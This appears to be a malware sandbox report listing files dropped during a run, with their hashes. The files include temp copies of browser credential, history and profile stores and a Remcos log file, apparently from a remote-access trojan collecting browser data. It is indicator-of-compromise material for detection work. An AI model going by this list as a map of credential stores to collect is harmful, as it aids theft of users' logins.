| MD5 | 0962291d6d367570bee5454721c17e11 |
| SHA1 | 59d10a893ef321a706a9255176761366115bedcb |
| SHA256 | ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7 |
| SHA512 | f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1
| MD5 | d0d388f3865d0523e451d6ba0be34cc4 |
| SHA1 | 8571c6a52aacc2747c048e3419e5657b74612995 |
| SHA256 | 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b |
| SHA512 | 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0
| MD5 | cf89d16bb9107c631daabf0c0ee58efb |
| SHA1 | 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b |
| SHA256 | d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e |
| SHA512 | 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0 |
memory/2400-153-0x0000000022010000-0x0000000022029000-memory.dmp
memory/2400-152-0x0000000022010000-0x0000000022029000-memory.dmp
memory/2400-149-0x0000000022010000-0x0000000022029000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\mjefag
| MD5 | ac300aeaf27709e2067788fdd4624843 |
| SHA1 | e98edd4615d35de96e30f1a0e13c05b42ee7eb7b |
| SHA256 | d2637d58bb120dc6fefe2f38d6e0d4b308006b8639106a7f9e915fa80b5cc9d9 |
| SHA512 | 09c46e708f9d253dccd4d943639d9f8126f868ae3dcd951aad12222bb98b5d3814676f878c8391b9bdab5dedcf5b9e9eaeb2ad3ffec57bda875198735586d4df |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat
| MD5 | 27fd94e525bf74864e40da4b3612eeb8 |
| SHA1 | c596943624798eb96ae067548305c01691eee6e6 |
| SHA256 | 05dde8e3836eeb31fdac7a0cc3da644b502fe299c85eb00b4423f1dfe9fdcb91 |
| SHA512 | 78425b52a1be542797d6f8d2a4971a40a962acf5d090daa546816916c815f2e21445636cf51839cce0fa9a8fab572ee8eda83b7a7226d3b8b795641fa91e8def |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat
| MD5 | 9e4e94633b73f4a7680240a0ffd6cd2c |
| SHA1 | e68e02453ce22736169a56fdb59043d33668368f |
| SHA256 | 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304 |
| SHA512 | 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat
| MD5 | 317d044f50c669a8fa12b4f766cc5f71 |
| SHA1 | f47318c99da5e580611514ffbc844e6909fb716c |
| SHA256 | e5805654720245bae000c07d5e977991257740d84fe8db6a141fb0640bd146e7 |
| SHA512 | 7744658f4cf747ec2baf5ee0e495acb71b2521ee16b07f022ea4e44221edacb4efab849e5fafc032a8ed952b5c3c21f6ecca7c93a1ae1cef8bffcf0ce396dfa7 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat
| MD5 | 5f4873669d1ab040e423ad87bedabdf4 |
| SHA1 | 9fe2d68f8264bc3e52aa068d8c9e9f748705698a |
| SHA256 | ec7ba41e513cd3d49d52b23d42533e8f5e674d5d9fa3fc55fc40c2b95b425096 |
| SHA512 | 7fdfb9d8dfd1ac26ecc4522cd0aaf6283134dbd5b348ef9110d57b0fed3f2e00ea4a16a452a54834d3af6efea8ffff5e7a1ca633daae2d3b50a0242762248440 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State
| MD5 | 3d2d0e92d8a651c6ab2ff89573cb2387 |
| SHA1 | 1733247e71238ceb6283601fa4bca11c657815f5 |
| SHA256 | 66e59a07892dcef395d533d84d972c6e56771b6976c8e8c3699d20d68fc4bf1e |
| SHA512 | 37580d77090173b78f011b5fc50847a7bd68c847659079a846b8dcb4b78c689af3373b0713ee3c0a970b54649b0b967475a751bf203a9fa310b8b5eaf1aa6491 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links
| MD5 | ba1cc5b1a7fa41db1806bc12d9e06a65 |
| SHA1 | 0003bfbf59f6b96db8e83a0cc7f121164b12bbe2 |
| SHA256 | 50cd13b1c040460b134258014c1ee4b5290a7456653972c9db58db07528440b6 |
| SHA512 | 2f352d4c9fd2f1c19e4809397966d5ce40b4ea06ba5a580e4cf7cd82757de6f3056a63db7505bc49b889f055ab37c6b19924a42c513b4e4f72a4e12d8d21f62c |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log
| MD5 | 148079685e25097536785f4536af014b |
| SHA1 | c5ff5b1b69487a9dd4d244d11bbafa91708c1a41 |
| SHA256 | f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8 |
| SHA512 | c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log
| MD5 | 90881c9c26f29fca29815a08ba858544 |
| SHA1 | 06fee974987b91d82c2839a4bb12991fa99e1bdd |
| SHA256 | a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a |
| SHA512 | 15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG
| MD5 | ae8580357c8254e846ab8598e556792d |
| SHA1 | 0c9768c08a055e3d5c505b49df2586e0bcc8f07e |
| SHA256 | 3c00e626112a3a424d0167280a62586ad0e4575d257962a8d82addecb35d97c6 |
| SHA512 | f4675be906a7fb00f2b9d9c1f57d71e9535cb14f82955324a4a441afeecbde4f424f58c87e2a954d7a7263a2d0f6ec911bbaea9d32688a7d5b641eed693c6cfd |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index
| MD5 | 54cb446f628b2ea4a5bce5769910512e |
| SHA1 | c27ca848427fe87f5cf4d0e0e3cd57151b0d820d |
| SHA256 | fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d |
| SHA512 | 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History
| MD5 | d30bfa66491904286f1907f46212dd72 |
| SHA1 | 9f56e96a6da2294512897ea2ea76953a70012564 |
| SHA256 | 25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907 |
| SHA512 | 44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG
| MD5 | a23a1ccd6edf23104620f1bb9f4f547b |
| SHA1 | 2078abb42cc2ad96d3cbb00b876bda35af59859c |
| SHA256 | b40c1227d466f7c9bd96b3cf26dfc63ea43427cc4f0515fa346332f4ff5cd7b1 |
| SHA512 | 6d2f9d8292e7f3bc0e099d14b1487940233d27d4849a5756cb2d0f1bc51afba0d7f1c5b3cb8ef9913b22ec138a1759abc26497aa936e67023b73a7a6396483e2 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data
| MD5 | c35ba8876d1932d40ef0961d656f473e |
| SHA1 | 004571bf1d1da9b87c399af9bffd8004ad0668c9 |
| SHA256 | 460344459d94034aeab7300abf5fe4d687b682538e9ab24e21249662534a0b16 |
| SHA512 | f5c871b6b00e97f3a6cc2f6f1ec7a07c5edb18ef822193025d042bd36c3de20a851eee223cbe1223d74348f33ffebaf3c9f4a2e71af70b31cd3cd393dc46a700 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences
| MD5 | 72fb8fdc79e886886d9cc89b88ef11db |
| SHA1 | b602840b49b5e657eb4f9cab689940c94179ebc4 |
| SHA256 | 623fb553bc909b8b591b994a232f3361b993a75d89d3374fa433af91ce63dfea |
| SHA512 | 0ac23f265781a01f7ab0434e4dbb9e1af441cd0227d317af3f9ab436a44585321b209e167bbabc7461e28407dde3ba3519d67c44d6f1762ad0fa4f151dd82f92 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences
| MD5 | 03f5b0d0cde36047423d3f5744da6aec |
| SHA1 | 76afd3c804078639efd8db85925aaff22cd7eabd |
| SHA256 | 9047f92d0844c71ca1e579e82ac66980b998ea13606175c4094b37dd4c515745 |
| SHA512 | b4958125b5bda3be2b898ea7cf4580c82585f41ebdfb8859575dfc0bdd851cd206d12c268bfe2b0cd29b3a32415c012a03040a17800c14ce525188be61def59f |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version
| MD5 | 838a7b32aefb618130392bc7d006aa2e |
| SHA1 | 5159e0f18c9e68f0e75e2239875aa994847b8290 |
| SHA256 | ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa |
| SHA512 | 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons
| MD5 | b40e1be3d7543b6678720c3aeaf3dec3 |
| SHA1 | 7758593d371b07423ba7cb84f99ebe3416624f56 |
| SHA256 | 2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4 |
| SHA512 | fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites
| MD5 | 986962efd2be05909f2aaded39b753a6 |
| SHA1 | 657924eda5b9473c70cc359d06b6ca731f6a1170 |
| SHA256 | d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889 |
| SHA512 | e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat
| MD5 | 32371b6dc560dd60285d3576fc66cce1 |
| SHA1 | 7ecd54d19a6262ca1d90ee5858116986847f0fc4 |
| SHA256 | 15f11555291d1e7d4008df75513d63267bb01589bb64c37b093881988ad83ab9 |
| SHA512 | 0592e3e2d3911d2d87d738132168bdf1a127258e4aa893936afcf70078d938697d1d104cb38fb8fddcdd9a95cdefe57473cd793fbf6ca06803183eba9963ef28 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index
| MD5 | 4ba10349f3befe34968f7ca4437aafd7 |
| SHA1 | 95146f48d9164d6707c146ab657cb8a6bcfe2438 |
| SHA256 | e2eac33c29c3d6c7bbc4fd7a142c372712606bad72a416da9ec7f56b3d29a83c |
| SHA512 | 844d8d3cb6d9bd1fefb905d7e7b68196ce112f80a17d4dce468bc961b431ce0a51ec2876ea98ec622d7f4abd4753edee25d62373cc9e2340120d1ac536164939 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG
| MD5 | b8c53c17a10b518cab9452e4521fa552 |
| SHA1 | 3b373f66a0171c05b4982d8d7281d782d2535f3e |
| SHA256 | 1991df4bf9aaf4368cb5bb8b3546084a58f88970d72d583c13e95a327182c4c4 |
| SHA512 | 90c03bfb214631d4ecf545398944a3ada13f04f2b62adf027140bb6517fe0b93601eb0224ce0bf87f0dd7dfa0ccee30eb073d18bf4118aa84f415a8f2ba7dea6 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG
| MD5 | d2e1ddd2f035bc9c876e6436d82211bf |
| SHA1 | ce7a7371e89e9a2be7a998580afe8e58ded22395 |
| SHA256 | 478cd2c35d6bbb003c34bb20c4f06f2d9e3eb7eceb785c22a24dbf7e5aa6d555 |
| SHA512 | 09a279080c2c98db999bcc6f0f8bcbfb864b06323cd63b390170eda9f1f3c1628c22a757e2bf2bd62883d5812fd3ba6968b84fc2f04ef60837e4a59989e042fb |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log
| MD5 | 69449520fd9c139c534e2970342c6bd8 |
| SHA1 | 230fe369a09def748f8cc23ad70fd19ed8d1b885 |
| SHA256 | 3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277 |
| SHA512 | ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log
| MD5 | 9082ba76dad3cf4f527b8bb631ef4bb2 |
| SHA1 | 4ab9c4a48c186b029d5f8ad4c3f53985499c21b0 |
| SHA256 | bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd |
| SHA512 | 621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG
| MD5 | 6d7732ece43bcf0323779f12d0c7890a |
| SHA1 | 026a0d7feb5508474d70731a8a3e22035a43100d |
| SHA256 | a6fca0d6dff89d0f7e15206dc34bb35e3bc74b8ce8a7028b87d8dd6d56065964 |
| SHA512 | 59eba3b222b38007225ca30330fa84424c83d56ab9e79691c3a858ef98b9548ba90384e60b4f1c8e031b0f8a16837f5b25f8c05d0b17cbad8ba769421cc27b6c |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log
| MD5 | 9dcac77a34b127cc6ffbc9d903c200be |
| SHA1 | dd03d3063d9447ea8ff3e56a58885ae6cf0cbeef |
| SHA256 | 695ff9680ecceb377a8c8579b53465b7ca6e8f99c71f3bf597f772b3816046ce |
| SHA512 | 64975b58eb851556ebc76184b7ae3f70c90b522aa7c243d93c871aee507b6669f9cf51159cbe91a98912632f3c8a3fa55c31d8e972801d335ce93689e6efe53f |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences
| MD5 | 3295bd8de9f873108efa25a44ddc9f1c |
| SHA1 | 4118c09dca532bb55239047ee17111ffc7e737a1 |
| SHA256 | ea02816ba763cecbe154b5fdef32fef2f5187c40c0c1f9d6cb11b3f0278eb74b |
| SHA512 | 6f68a3fd12c3395f0fe219827b26f999d23d503d5522d288c929aeb4fe200237c740c9aa0d08b6492d94477c4b3cd1e1a57a3458fe7e1b9c99ad41464fa21afe |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG
| MD5 | c022ae7c9a90a8394b7762dfbb61c674 |
| SHA1 | 5344261d8517843d2f33b2d3a8228ca80a7b9e2f |
| SHA256 | 2e5f065db402f038c8b1fbf9bbc9dd987e5ba747e89676c71bd9b508b2996545 |
| SHA512 | 23dcd933d0add359920286bc8225e9fa5ac14e8793a5bf90b6ab025382844214236bc0a383b5ccdb5e2c986e2781315e90c8473c7e9e6ed337d3297de05062a1 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index
| MD5 | bfc1e625b1da2fce382b2365c773e1a6 |
| SHA1 | 6a3913fb539f650e4f22c7afa1d1f5a124e37b76 |
| SHA256 | 230c201941a98941edfce0eddd0d01e36d8adb52a11c1e09199796645b4432f9 |
| SHA512 | f1cc86636a0e228cde249d5d7c75fc5adef8cdf3a4bec917fac7fc49bca7e3e83868017092fae7f4e1a5aac0648ebfea43625d293ab210d2a9307f4386e5b46a |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index
| MD5 | d250f162a2d2e500b40864682605cc26 |
| SHA1 | 250f25a3d167075095f0a03dc9c68908d3e40038 |
| SHA256 | e894385bc001a5d2994ce1c97f4c355f19d1cd1c805bfdc3b09fd2fac3af8cc3 |
| SHA512 | 821d05d450caa0afd61c39fa8b2dbfe8d762e6e9d92cca08513868b1562e5733b9927821fbbb1f0fd2dc07c372bd1e078ed543079172115bbb06b4a8fc04339b |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG
| MD5 | 5ee1acea20c641249001096ce217c7a8 |
| SHA1 | 604076886f02ae2e455cc90147bb93aff28cfdbf |
| SHA256 | 22d81cf13acd5b1cec2a69a155f3c45f063b9c75f55c117c6d7d00b4db9b9f91 |
| SHA512 | 214bd384dcea00b061fda4ec1a171b961670eab190d40f32412a92b73dd0d715cdeb423e10c3b38230e7f7a00ef0be6c3bcc74d1970d397c940ca9a07ba043a7 |
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk
| MD5 | 38fb716ea1b98ca10eb7f8c8a6002796 |
| SHA1 | 0b9b19ca4bae50d14e284d9a4968f8426932b787 |
| SHA256 | dd46df74499fbec20150154b60ab83b53b76e5c12388f96cd812650388a45da2 |
| SHA512 | 7085f7374646e59e5748cf2f87b07e4dba706cf3b4d4aa4cef9c7fe06a78d1d4a10c9e132201a1f77d5f7b5c87f652b87dd4bf90b933bc0f1eb33415e215d20c |
C:\ProgramData\remcos\logs.dat
| MD5 | 603c41ffecff412d9821a7f4ed2276e5 |
| SHA1 | 25cddc919515fc1b93a9c99de9c36fc81cf6ec66 |
| SHA256 | 0abdd57c92430d5fb4e14a257b8a4e404921a9b8a2a44ea225f59c2d36a77e7d |
| SHA512 | b9dbaccdc42253c0b40e69f354fdf90149128efcc0c4a0719dfc93a9493565579b9b370965e9242b0d220f41e8f10befa2fdc45b8028420796922ac50c93ea2b |